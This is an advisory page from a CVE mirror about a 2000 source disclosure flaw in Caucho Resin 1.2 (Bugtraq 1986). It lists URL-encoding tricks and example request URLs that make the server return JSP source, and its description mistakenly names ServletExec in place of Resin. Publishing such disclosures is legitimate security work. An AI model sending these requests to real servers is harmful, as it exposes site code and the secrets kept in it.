Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

BID:1986

Info

Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

Bugtraq ID: 1986
Class: Input Validation Error
CVE: CVE-2000-1224
Remote: Yes
Local: Yes
Published: Nov 23 2000 12:00AM
Updated: Mar 19 2015 09:21AM
Credit: Discovered and submitted by email on Nov 23, 2000 benjurry <[email protected]>.
Vulnerable: Caucho Resin 1.2
- Apache Apache 1.3.9
- Microsoft IIS 5.0
Not Vulnerable:

Discussion

Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

Resin is a servlet and JSP engine that supports java and javascript.

ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on.

Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.

Exploit / POC

Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

The following exploit has been provided by benjurry <[email protected]>:

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp

References

Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report